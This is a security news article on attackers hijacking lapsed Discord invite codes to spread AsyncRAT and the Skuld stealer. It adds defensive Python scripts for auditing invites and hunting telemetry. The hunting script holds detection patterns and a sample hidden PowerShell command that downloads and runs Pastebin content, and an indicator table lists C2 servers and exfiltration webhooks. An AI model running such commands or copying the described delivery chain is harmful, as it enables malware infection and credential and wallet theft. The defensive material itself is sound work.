Threat actors are exploiting Discord’s trusted invite infrastructure to redirect users to malicious servers and deploy advanced malware, including the infamous AsyncRAT remote access trojan and Skuld stealer.
This campaign leverages Discord’s popularity among gamers, crypto communities, and developers, turning the platform’s own features such as vanity invites and server boosts into vectors for phishing, credential theft, and malware distribution.
Technical Abuse of Discord Vanity Invites
Discord allows servers with high community engagement (Level 3 Boost) to claim custom vanity invite codes.

Attackers are capitalizing on a crucial loophole: when a server loses its vanity code (typically because its Boost level drops below Level 3) or a once-permanent invite code lapses, nothing reserves that code, and adversaries quickly register the same string as the vanity URL of an attacker-controlled server.

This lets adversaries hijack established, trusted invite URLs that are already embedded in blogs, community sites, and social media posts, silently redirecting every future visitor to a malicious Discord server under their control.
Attackers also benefit from inconsistent invite handling in Discord clients and from a common user misconception: many believe that setting an invite to "never expire" makes the code itself permanent, but that option only governs the lifetime of a standard invite link; it does not reserve the code, so once the original invite lapses the string is free for anyone to claim.
Attackers monitor for lapsed codes, claim them, and then push phishing lures and malware through the revived link.
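The practical defence against this hijack is to periodically re-resolve every invite link you have ever published and confirm it still points at your own guild. The following script is an added example and is not code from the article or from Dark Atlas: it pulls invite codes out of page text, resolves each one through Discord's public invite endpoint (GET /api/v10/invites/{code}, which needs no authentication; the response shape used here is an assumption based on the public API documentation), and compares the guild ID it now resolves to with the guild the invite was created for. The fetcher is injectable, so the demo below runs offline against constructed responses; the guild IDs and invite codes are made up.

```python
"""Audit published Discord invite links for expiry or vanity-code hijack.

Added example, not code from the article or from Dark Atlas.  Assumes the
public invite endpoint GET https://discord.com/api/v10/invites/<code> returns
200 with a JSON body containing guild.id / guild.name, and 404 with
{"message": "Unknown Invite", "code": 10006} once the code no longer resolves.
"""
import json
import re
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional

# Matches discord.gg/<code> and discord.com/invite/<code> links in free text.
INVITE_RE = re.compile(
    r"(?:https?://)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)"
)


def extract_invite_codes(text: str) -> list[str]:
    """Pull invite codes out of page text (blog posts, READMEs, bios)."""
    return INVITE_RE.findall(text)


@dataclass
class InviteStatus:
    code: str
    status: str                     # "ok" | "hijacked" | "dead" | "error"
    guild_id: Optional[str] = None
    guild_name: Optional[str] = None


Fetcher = Callable[[str], tuple[int, dict]]


def fetch_invite_live(code: str) -> tuple[int, dict]:
    """Real fetcher: (http_status, json_body).  Not used by the offline demo."""
    req = urllib.request.Request(
        f"https://discord.com/api/v10/invites/{code}",
        headers={"User-Agent": "invite-audit/1.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"{}")


def audit_invites(expected: dict[str, str], fetch: Fetcher) -> list[InviteStatus]:
    """Compare each published code against the guild ID it was created for.

    The comparison keys on guild ID, never on the guild name: a hijacker's
    server will usually copy the original name and icon.
    """
    results = []
    for code, expected_guild in expected.items():
        status, body = fetch(code)
        if status == 404:
            # The code no longer resolves.  This is exactly the window an
            # attacker waits for before registering it as a vanity URL.
            results.append(InviteStatus(code, "dead"))
        elif status != 200:
            results.append(InviteStatus(code, "error"))
        else:
            guild = body.get("guild") or {}
            gid, name = guild.get("id"), guild.get("name")
            verdict = "ok" if gid == expected_guild else "hijacked"
            results.append(InviteStatus(code, verdict, gid, name))
    return results


# Constructed stand-in for the API so the demo runs offline.  Guild IDs are
# made-up snowflakes.  "oldvanity" has been re-registered by a different guild
# whose name imitates the original.
FAKE_API = {
    "ourcommunity": (200, {"code": "ourcommunity",
                           "guild": {"id": "111111111111111111", "name": "Our Community"}}),
    "oldvanity":    (200, {"code": "oldvanity",
                           "guild": {"id": "999999999999999999", "name": "Our Community"}}),
    "expired123":   (404, {"message": "Unknown Invite", "code": 10006}),
}


def fetch_fake(code: str) -> tuple[int, dict]:
    return FAKE_API.get(code, (404, {"message": "Unknown Invite", "code": 10006}))


# Every code we ever published, and the guild it was created for.
PUBLISHED = {
    "ourcommunity": "111111111111111111",
    "oldvanity": "111111111111111111",
    "expired123": "111111111111111111",
}


def run_demo(fetch: Fetcher = fetch_fake) -> dict[str, str]:
    return {r.code: r.status for r in audit_invites(PUBLISHED, fetch)}


if __name__ == "__main__":
    for r in audit_invites(PUBLISHED, fetch_fake):
        print(f"{r.code:14} {r.status:9} {r.guild_id or '-':20} {r.guild_name or ''}")
```

Run it on a schedule with `fetch_invite_live` and treat both "dead" and "hijacked" as incidents: a dead code should be removed from every page that carries it before someone else claims it, and a hijacked one means the link is already steering your users to an attacker's server.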
Once lured into the attacker's Discord server, victims typically see only a single channel, often named #verify.
There, a malicious custom bot (posing as "Safeguard" or a similarly named verification service) prompts users to click a "Verify" button.
According to the Dark Atlas report, this button redirects them to a phishing website (e.g., captchaguard[.]me) masquerading as a legitimate verification or CAPTCHA portal.
The phishing site abuses Discord's OAuth2 authorization flow, tricking users into granting access and harvesting their tokens and account metadata.
The fake portal mimics Discord's UI and presents a final "Verify" button; clicking it runs JavaScript that silently copies a PowerShell downloader command to the clipboard.
The page then instructs the user to paste and run that "verification" command, and doing so starts the malware infection chain.
Malware Payloads
The primary malware delivered is AsyncRAT (v0.5.8), a powerful open-source remote access trojan with capabilities including command execution, keylogging, remote desktop, and persistent surveillance.
This variant uses a "dead drop" resolver: instead of carrying a hard-coded Command and Control (C2) address, it fetches the current C2 from a Pastebin paste at runtime, so the operator can rotate infrastructure without rebuilding the implant, which complicates detection and takedown. A tailored build of the Skuld stealer is deployed alongside it.
Written in Go, Skuld targets browser credentials, Discord tokens, and cryptocurrency wallet secrets, specifically attacking local Exodus and Atomic wallet installations by injecting malicious JavaScript into the wallets' .asar application bundles.
Stolen seed phrases and passwords are silently exfiltrated through Discord webhook endpoints, and the malware uses a mutex so that only one instance runs on a host.
This campaign stands out for its modular, multi-stage delivery mechanism, which uses trusted platforms such as GitHub, Bitbucket, and Pastebin to host payloads and stage execution.
By relying on scheduled tasks for persistence and on ChromeKatz to lift cookies directly from the browser's memory (bypassing Chrome's App-Bound Encryption, ABE, which only protects the on-disk cookie store), the attackers maintain durable access while keeping detection rates low.
Campaign analysis reveals over 1,300 payload downloads, with infections reported across the U.S., Europe, and Asia.
The focus on cryptocurrency wallet theft and Discord credential compromise underscores the extensive financial motivation and operational sophistication behind these operations.
The abuse of Discord’s invite and vanity link infrastructure presents a potent and persistent threat for online communities.
Users are advised to verify the legitimacy of Discord invitations, particularly those circulated on public sites, and to be wary whenever a server pushes them to an external "verification" portal or asks them to paste a command.
Security teams should monitor for the IOCs below, educate users on the risks of reused invite links, and proactively hunt for Discord webhook traffic, Pastebin dead-drop fetches, and PowerShell one-liners originating from pasted "verification" steps.
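The ClickFix-style PowerShell step described in the verification section and the webhook and Pastebin hunting recommended here can both be expressed as a handful of pattern checks over endpoint and proxy telemetry. The script below is an added example (not code from the article or from Dark Atlas) that tags the stages of this chain in constructed JSON events; the event fields (process, parent, cmdline, url) and all sample values are assumptions, not data from the report.

```python
"""Tag the stages of the Discord invite-hijack chain in endpoint/proxy events.

Added example, not code from the article or from Dark Atlas.  Each input line is
a constructed JSON event with the assumed fields process, parent, cmdline, url.
"""
import json
import re

# Discord webhook endpoint, including the ptb/canary hosts and the legacy domain.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/"
)
# Raw Pastebin fetch: the dead-drop resolver pattern used to look up the C2.
DEAD_DROP_RE = re.compile(r"https?://pastebin\.com/raw/\w+")
# Executables served straight out of a GitHub or Bitbucket repository.
HOSTED_PAYLOAD_RE = re.compile(
    r"https?://(?:github\.com/[^/\s]+/[^/\s]+/raw/|raw\.githubusercontent\.com/"
    r"|bitbucket\.org/[^/\s]+/[^/\s]+/downloads/)\S+\.(?:exe|dll|ps1|zip)",
    re.I,
)
# PowerShell launched with the switches a pasted "verification" one-liner
# typically carries: hidden window, bypassed policy, encoded or downloaded code.
CLICKFIX_RE = re.compile(
    r"(?:powershell|pwsh)(?:\.exe)?\b.*?"
    r"(?:-w(?:indowstyle)?\s+h(?:idden)?|-e(?:xecutionpolicy|p)\s+bypass"
    r"|-e(?:nc(?:odedcommand)?)?\s|\biex\b|invoke-expression|\biwr\b"
    r"|invoke-webrequest|downloadstring)",
    re.I,
)
# A browser reaching these URLs is usually a human; a stealer or RAT is not.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def classify(event: dict) -> list[str]:
    """Return the stage tags that apply to one event (empty list if none)."""
    proc = event.get("process", "").lower()
    cmd = event.get("cmdline", "")
    text = f"{event.get('url', '')} {cmd}"       # URLs can sit in either field
    hits = []
    if CLICKFIX_RE.search(cmd):
        hits.append("clickfix_powershell")
    if proc not in BROWSERS:
        if DEAD_DROP_RE.search(text):
            hits.append("pastebin_dead_drop")
        if WEBHOOK_RE.search(text):
            hits.append("discord_webhook_exfil")
        if HOSTED_PAYLOAD_RE.search(text):
            hits.append("repo_hosted_payload")
    return hits


def hunt(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Run classify() over JSON lines; return (line_no, tags) for each hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        tags = classify(json.loads(line))
        if tags:
            findings.append((n, tags))
    return findings


# Constructed sample events.  Paste IDs, webhook IDs and paths are made up.
SAMPLE_EVENTS = [
    '{"process": "powershell.exe", "parent": "explorer.exe", "url": "", '
    '"cmdline": "powershell.exe -w hidden -ep bypass -c iwr https://pastebin.com/raw/EXAMPLE1 | iex"}',
    '{"process": "cks.exe", "parent": "powershell.exe", "cmdline": "cks.exe", '
    '"url": "https://pastebin.com/raw/aB3xY9zQ"}',
    '{"process": "skul.exe", "parent": "cks.exe", "cmdline": "skul.exe", '
    '"url": "https://discord.com/api/webhooks/123456789012345678/AbCdEf-constructed"}',
    '{"process": "chrome.exe", "parent": "explorer.exe", "cmdline": "chrome.exe", '
    '"url": "https://discord.com/api/webhooks/123456789012345678/AbCdEf-constructed"}',
    '{"process": "powershell.exe", "parent": "explorer.exe", '
    '"cmdline": "powershell.exe -c Start-Process installer.exe", '
    '"url": "https://github.com/example-user/update/raw/refs/heads/main/installer.exe"}',
]


if __name__ == "__main__":
    for line_no, tags in hunt(SAMPLE_EVENTS):
        print(f"event {line_no}: {', '.join(tags)}")
```

The browser exclusion is a tuning choice, not a rule: on a fleet where nobody should be posting to Discord webhooks at all, drop it and alert on every non-Discord-client hit, and pair the "clickfix_powershell" tag with a parent of explorer.exe (the Run dialog) to separate pasted one-liners from administrative scripts.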
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| SHA256 | 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe | AsyncRAT Sample 1 |
| SHA256 | d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1 | AsyncRAT Sample 2 |
| SHA256 | 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c | Skuld Stealer Variant |
| SHA256 | 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693 | Downloader (Updated) |
| IP:port | 101.99.76.120:7707 | AsyncRAT C2 |
| IP:port | 87.120.127.37:7707, 185.234.247.8:7707 | AsyncRAT C2 Servers |
| Domain | microads[.]top | AsyncRAT C2 Domain |
| URL | https://captchaguard[.]me/?key= | Phishing / Credential Harvest Site |
| URL | https://pastebin[.]com/raw/ftknPNF7 | AsyncRAT Dead Drop Resolver |
| URL | https://bitbucket[.]org/syscontrol6/syscontrol/downloads/cks.exe | Malware Payload |
| Webhook | https://discord[.]com/api/webhooks/1355186248578502736/_RDywh_K6… | Data Exfiltration (Skuld Stealer) |
| Webhook | https://discord[.]com/api/webhooks/1348629600560742462/RJgSAE7c… | Crypto Wallet Seeds Exfiltration |
| GitHub Loader | https://github[.]com/frfs1/update/raw/refs/heads/main/installer.exe | Initial Installer |
| Bitbucket Loader | https://bitbucket[.]org/updatevak/upd/downloads/skul.exe | Skuld Stealer Binary |